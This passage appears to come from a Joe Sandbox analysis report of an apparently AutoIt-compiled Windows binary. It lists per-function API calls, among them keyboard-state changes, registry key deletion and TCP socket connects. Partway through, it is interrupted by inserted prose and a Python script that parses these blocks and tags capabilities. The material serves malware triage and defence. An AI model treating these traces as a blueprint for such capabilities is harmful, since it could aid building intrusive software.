                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Similarity
                                                                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                    • String ID: @
                                                                    • API String ID: 3522835683-2766056989
                                                                    • Opcode ID: 1b638d38903cf7c07cd290201b7052fecdba7575832c5ae9c6e29d91a170dfe1
                                                                    • Instruction ID: 76ebed73ce5d8bb4ff9a69bded1b45359fab36d2bc09e77b8cd80e53b4b7f4a2
                                                                    • Opcode Fuzzy Hash: 1b638d38903cf7c07cd290201b7052fecdba7575832c5ae9c6e29d91a170dfe1
                                                                    • Instruction Fuzzy Hash: F261A5B5A00619DFCB14EF98C8819AEBBF5FF48310F184069E955AB351CB74AD41DF90
                                                                    APIs
                                                                    • GetParent.USER32(?), ref: 01030F8C
                                                                    • GetKeyboardState.USER32(?), ref: 01030FA1
                                                                    • SetKeyboardState.USER32(?), ref: 01031002
                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 01031030
                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 0103104F
                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 01031095
                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 010310B8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Similarity
                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                    • String ID:
                                                                    • API String ID: 87235514-0
                                                                    • Opcode ID: 6603e6b6c11cd617e2427c3c853c564e6a8ec602088e32cd728bc82ed57e6051
                                                                    • Instruction ID: 94036b1de6ad588c988f3b4e2427de56fd8d65cb7d6a6f35e5682fc9f02000af
                                                                    • Opcode Fuzzy Hash: 6603e6b6c11cd617e2427c3c853c564e6a8ec602088e32cd728bc82ed57e6051
                                                                    • Instruction Fuzzy Hash: DA51C3B06047D63DFB3642388845BBABEED5B8A304F0885C9F2D5468D3C2E9E8D4D751
                                                                    APIs
                                                                    • GetParent.USER32(00000000), ref: 01030DA5
                                                                    • GetKeyboardState.USER32(?), ref: 01030DBA
                                                                    • SetKeyboardState.USER32(?), ref: 01030E1B
                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 01030E47
                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 01030E64
                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 01030EA8
                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 01030EC9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Similarity
                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                    • String ID:
                                                                    • API String ID: 87235514-0
                                                                    • Opcode ID: f446fc98a621f6f08ba018383586acc0c2297b859f1597940bdcd80e0434bd33
                                                                    • Instruction ID: 240d085fabe19961625fa3b4ca72233e9821e0990d285d50eb778ee45896f108
                                                                    • Opcode Fuzzy Hash: f446fc98a621f6f08ba018383586acc0c2297b859f1597940bdcd80e0434bd33
                                                                    • Instruction Fuzzy Hash: CC51E6A06467D63DFB7692388C45BBA7FED5F86300F0884C9F2D4468C6D395E898D760
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Similarity
                                                                    • API ID: _wcsncpy$LocalTime
                                                                    • String ID:
                                                                    • API String ID: 2945705084-0
                                                                    • Opcode ID: 9fac40ba25e33a3655914bf6aeb1234f86b32f789c7e8d1318347563450b7c85
                                                                    • Instruction ID: 7bf2a05b830d0ce6ca49d33dba2a5fa93c06b73aeb7fa891dfabedbda47eafcb
                                                                    • Opcode Fuzzy Hash: 9fac40ba25e33a3655914bf6aeb1234f86b32f789c7e8d1318347563450b7c85
                                                                    • Instruction Fuzzy Hash: 9141B365C1121876CB11EBF49C4A9EFB7BCAF44310F448856E749E3231EA38E345D7AA
                                                                    APIs
                                                                      • Part of subcall function 0103466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,01033697,?), ref: 0103468B
                                                                      • Part of subcall function 0103466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,01033697,?), ref: 010346A4
                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 010336B7
                                                                    • _wcscmp.LIBCMT ref: 010336D3
                                                                    • MoveFileW.KERNEL32(?,?), ref: 010336EB
                                                                    • _wcscat.LIBCMT ref: 01033733
                                                                    • SHFileOperationW.SHELL32(?), ref: 0103379F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Similarity
                                                                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                    • String ID: \*.*
                                                                    • API String ID: 1377345388-1173974218
                                                                    • Opcode ID: 30ad877860137dc5fe3943107aad72f7cb113c325de2eceaa66709ecdd9aa3a1
                                                                    • Instruction ID: 0fce94206bbfeb95bba7c0863887ed8f2514d7a3f0323f077a93284c9aa38f78
                                                                    • Opcode Fuzzy Hash: 30ad877860137dc5fe3943107aad72f7cb113c325de2eceaa66709ecdd9aa3a1
                                                                    • Instruction Fuzzy Hash: 01418E71508345AED762EF64D4859DFB7ECBFC8280F00486EB5CAC7251EA38D289C752
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 010572AA
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01057351
                                                                    • IsMenu.USER32(?), ref: 01057369
                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 010573B1
                                                                    • DrawMenuBar.USER32 ref: 010573C4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Similarity
                                                                    • API ID: Menu$Item$DrawInfoInsert_memset
                                                                    • String ID: 0
                                                                    • API String ID: 3866635326-4108050209
                                                                    • Opcode ID: 4373b766b720beaf8bf20114798edeb83a5d2171963f399468a87de5148a331e
                                                                    • Instruction ID: 701633a516bb46638f857b37cbaa62db2514f42d20940f403fad152cdba756f9
                                                                    • Opcode Fuzzy Hash: 4373b766b720beaf8bf20114798edeb83a5d2171963f399468a87de5148a331e
                                                                    • Instruction Fuzzy Hash: 99417671A00209EFDB61CF54D885AAABBF8FF08360F448069FE85AB251C735AD04EF50
                                                                    APIs
                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 01050FD4
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 01050FFE
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 010510B5
                                                                      • Part of subcall function 01050FA5: RegCloseKey.ADVAPI32(?), ref: 0105101B
                                                                      • Part of subcall function 01050FA5: FreeLibrary.KERNEL32(?), ref: 0105106D
                                                                      • Part of subcall function 01050FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 01051090
                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 01051058
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                     • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                    • String ID:
                                                                    • API String ID: 395352322-0
                                                                    • Opcode ID: f89b6185d9d64cf24cef70d4622eb2f5fbfa3291689e18f60719f54f0a3ca89b
                                                                    • Instruction ID: 801375ef34c4c15bc973c77ed1cd736cb355fa6d34df6b3aff7463bfc2470f12
                                                                    • Opcode Fuzzy Hash: f89b6185d9d64cf24cef70d4622eb2f5fbfa3291689e18f60719f54f0a3ca89b
                                                                    • Instruction Fuzzy Hash: BF310F71A01209BFEB659F94DC89EFFBBBCEF08310F0411A9F941A2140DA759A459BA0
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 010562EC
                                                                    • GetWindowLongW.USER32(01516A70,000000F0), ref: 0105631F
                                                                    • GetWindowLongW.USER32(01516A70,000000F0), ref: 01056354
                                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 01056386
                                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 010563B0
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 010563C1
                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 010563DB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                     • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: LongWindow$MessageSend
                                                                    • String ID:
                                                                    • API String ID: 2178440468-0
                                                                    • Opcode ID: 87c34c5c744eba692d20ebc00d2336f5d056cbe765dc43dd46ea9d2c543580ef
                                                                    • Instruction ID: 4f7ee094fc5886be22e841ab0d22427fe5d39f60de10d8cfce7d4902ed4e5753
                                                                    • Opcode Fuzzy Hash: 87c34c5c744eba692d20ebc00d2336f5d056cbe765dc43dd46ea9d2c543580ef
                                                                    • Instruction Fuzzy Hash: 1D313730600241AFDBB2CF29D894F563BE1FB4A754F5841A4F9919F2B6CB77A840CB50
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0102DB2E
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0102DB54
                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0102DB57
                                                                    • SysAllocString.OLEAUT32(?), ref: 0102DB75
                                                                    • SysFreeString.OLEAUT32(?), ref: 0102DB7E
                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 0102DBA3
                                                                    • SysAllocString.OLEAUT32(?), ref: 0102DBB1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                     • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                    • String ID:
                                                                    • API String ID: 3761583154-0
                                                                    • Opcode ID: 931151bcbe09f23b4864bc57d8682688a9111969c4ce6f8af582e0091d4d5553
                                                                    • Instruction ID: 6c6e76b3c0fdea697e0b4f544dd4cb0387356f91a7dc34d9832c67dc4150b22d
                                                                    • Opcode Fuzzy Hash: 931151bcbe09f23b4864bc57d8682688a9111969c4ce6f8af582e0091d4d5553
                                                                    • Instruction Fuzzy Hash: B121B732600219AFDF11DEE8DC44CBB77ECEB09264B008165FE94DB151DA74DC418B60
                                                                    APIs
                                                                      • Part of subcall function 01047D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 01047DB6
                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 010461C6
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 010461D5
                                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0104620E
                                                                    • connect.WSOCK32(00000000,?,00000010), ref: 01046217
                                                                    • WSAGetLastError.WSOCK32 ref: 01046221
                                                                    • closesocket.WSOCK32(00000000), ref: 0104624A
                                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 01046263
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                     • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                    • String ID:
                                                                    • API String ID: 910771015-0
                                                                    • Opcode ID: cb28c5221af7b9878a6eae4e5cfe693ca7185c3170f4f49d283cbd86f25d548b
                                                                    • Instruction ID: 269e45d8f6271ff4fd8fcb59907d623d70a815278f6b5a742d197812ad53ed1f
                                                                    • Opcode Fuzzy Hash: cb28c5221af7b9878a6eae4e5cfe693ca7185c3170f4f49d283cbd86f25d548b
                                                                    • Instruction Fuzzy Hash: 4A31B571600219AFDF10AF64CCC4BBE7BADEF45710F044069FD85E7291DB79A9049B61
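The API listings above are the raw material for triage: the function at 01050FD4 pairs RegEnumKeyExW with RegDeleteKeyW (the enumerate-then-delete shape of a recursive key delete), and the function at 010461C6 calls socket(2,1,6), ioctlsocket with 8004667E and connect (a TCP socket switched to non-blocking mode before connecting). The parser below is an added example, not part of the Joe Sandbox report or its tooling: it reads these "APIs" blocks, recovers each call's module, arguments and subcall origin, and tags capabilities from the observed API set, decoding socket(2,1,6) as AF_INET/SOCK_STREAM/IPPROTO_TCP and 8004667E as the Winsock FIONBIO code. The rule labels are my own choice; the embedded sample input is quoted from the two blocks above, trimmed to the lines the parser needs.

```python
"""Parse Joe Sandbox function-analysis text (the 'APIs'/'Similarity' blocks above)
into per-function API call lists and tag what each function can do."""
from __future__ import annotations
import re
from dataclasses import dataclass, field
from typing import Callable, Optional

# Call line: "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR", optionally
# prefixed with "Part of subcall function ADDR:" for calls made one level down.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>API ID|String ID):\s*(?P<val>.*)$")
FIONBIO = 0x8004667E  # Winsock _IOW('f', 126, u_long): toggles non-blocking mode

@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str
    subcall_of: Optional[str] = None  # callee address when the call is one level down

@dataclass
class FunctionRecord:
    calls: list[ApiCall] = field(default_factory=list)
    api_id: str = ""
    string_id: str = ""

    def api_names(self) -> set[str]:
        return {c.name for c in self.calls}

def parse_report(text: str) -> list[FunctionRecord]:
    """Each 'APIs' heading opens a new function record; call and ID lines fill it."""
    records: list[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionRecord()
            records.append(current)
        elif current is None:
            continue
        elif (m := CALL_RE.match(line)):
            raw = m.group("args")
            args = [a.strip() for a in raw.split(",")] if raw else []
            current.calls.append(ApiCall(m.group("name"), m.group("module"), args, m.group("ref"), m.group("sub")))
        elif (m := FIELD_RE.match(line)):
            setattr(current, m.group("key").lower().replace(" ", "_"), m.group("val").strip())
    return records

def _hexval(a: str) -> Optional[int]:
    try:
        return int(a, 16)
    except ValueError:  # '?' marks an argument the sandbox could not resolve
        return None

def _has(names: set[str]) -> Callable[[FunctionRecord], bool]:
    return lambda rec: names <= rec.api_names()

def _tcp_socket(rec: FunctionRecord) -> bool:  # socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
    return any(c.name == "socket" and [_hexval(a) for a in c.args[:3]] == [2, 1, 6] for c in rec.calls)

def _nonblocking_connect(rec: FunctionRecord) -> bool:
    fionbio = any(c.name == "ioctlsocket" and len(c.args) > 1 and _hexval(c.args[1]) == FIONBIO
                  for c in rec.calls)
    return fionbio and "connect" in rec.api_names()

# Capability rules over the observed API set; output order follows this list.
RULES: list[tuple[str, Callable[[FunctionRecord], bool]]] = [
    ("registry: enumerate and delete subkeys (recursive key delete)", _has({"RegEnumKeyExW", "RegDeleteKeyW"})),
    ("network: TCP socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)", _tcp_socket),
    ("network: non-blocking connect (ioctlsocket FIONBIO)", _nonblocking_connect),
    ("loader: runtime API resolution (GetProcAddress)", _has({"GetProcAddress"})),
    ("com: BSTR and GUID string handling", _has({"SysAllocString", "StringFromGUID2"})),
]

def tag_capabilities(rec: FunctionRecord) -> list[str]:
    return [label for label, rule in RULES if rule(rec)]

# Sample input: two function blocks quoted from the report above (trimmed to the needed lines).
SAMPLE = """\
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 01050FD4
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 01050FFE
  • Part of subcall function 01050FA5: RegCloseKey.ADVAPI32(?), ref: 0105101B
• RegDeleteKeyW.ADVAPI32(?,?), ref: 01051058
• Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
• API ID: EnumFreeLibrary$CloseDeleteOpen
APIs
  • Part of subcall function 01047D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 01047DB6
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 010461C6
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0104620E
• connect.WSOCK32(00000000,?,00000010), ref: 01046217
• WSAGetLastError.WSOCK32 ref: 01046221
• API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
"""

if __name__ == "__main__":
    for rec in parse_report(SAMPLE):
        print(rec.api_id, sorted(rec.api_names()), tag_capabilities(rec))
```

Run it against a whole report dump and the tags become a quick index of which functions touch the registry, open sockets or resolve imports at runtime; unresolved arguments ("?") are skipped rather than guessed, so a rule only fires on values the sandbox actually recorded.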
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                     • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsnicmp
                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                    • API String ID: 1038674560-2734436370
                                                                    • Opcode ID: 08de4cef7f7df7070c4f66a3ed05e17c8e02ca3f3b9e637f2a1519b737637b60
                                                                    • Instruction ID: bf6cb43977c94fc2915e3a8800faa8eab8ba45f299db2f18d8c7e7e040aa98cc
                                                                    • Opcode Fuzzy Hash: 08de4cef7f7df7070c4f66a3ed05e17c8e02ca3f3b9e637f2a1519b737637b60
                                                                    • Instruction Fuzzy Hash: 6F21497220453366D331BB38AC06EBB73E8EF593C0F044029FAC6CA162EB959D45D395
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0102DC09
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0102DC2F
                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0102DC32
                                                                    • SysAllocString.OLEAUT32 ref: 0102DC53
                                                                    • SysFreeString.OLEAUT32 ref: 0102DC5C
                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 0102DC76
                                                                    • SysAllocString.OLEAUT32(?), ref: 0102DC84
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                     • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                    • String ID:
                                                                    • API String ID: 3761583154-0
                                                                    • Opcode ID: d5a3a456e44f4349a5f04a4049aea5cb59a7870bfccf6aaac9412c0f52aa889e
                                                                    • Instruction ID: a6085901c4bda3f986be478b1be0c05c9fcc0953fd2efdc7ef1c4ca2d364ab9f
                                                                    • Opcode Fuzzy Hash: d5a3a456e44f4349a5f04a4049aea5cb59a7870bfccf6aaac9412c0f52aa889e
                                                                    • Instruction Fuzzy Hash: AC21A735605219AF9B11EFECDC88CAB77ECEB09360B108165F984CB255DA78DC41CB64
                                                                    APIs
                                                                      • Part of subcall function 00FD1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FD1D73
                                                                      • Part of subcall function 00FD1D35: GetStockObject.GDI32(00000011), ref: 00FD1D87
                                                                      • Part of subcall function 00FD1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FD1D91
                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 01057632
                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0105763F
                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0105764A
                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 01057659
                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 01057665
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                     • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                    • String ID: Msctls_Progress32
                                                                    • API String ID: 1025951953-3636473452
                                                                    • Opcode ID: 348ea8257eb4d58a5183282cb3ee3a685f04327a767d904cf8981a4a3deb7c98
                                                                    • Instruction ID: 4507df60307cc4cb2243188bbcaba65c58b792ba0b81bf569a33c579ddce4e73
                                                                    • Opcode Fuzzy Hash: 348ea8257eb4d58a5183282cb3ee3a685f04327a767d904cf8981a4a3deb7c98
                                                                    • Instruction Fuzzy Hash: 6E11B2B2110219BFEF159F65CC85EEBBF6EFF0C798F014115BA44A6050CA72AC21DBA4
                                                                    APIs
                                                                    • __init_pointers.LIBCMT ref: 00FF9AE6
                                                                      • Part of subcall function 00FF3187: EncodePointer.KERNEL32(00000000), ref: 00FF318A
                                                                      • Part of subcall function 00FF3187: __initp_misc_winsig.LIBCMT ref: 00FF31A5
                                                                      • Part of subcall function 00FF3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00FF9EA0
                                                                      • Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00FF9EB4
                                                                      • Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00FF9EC7
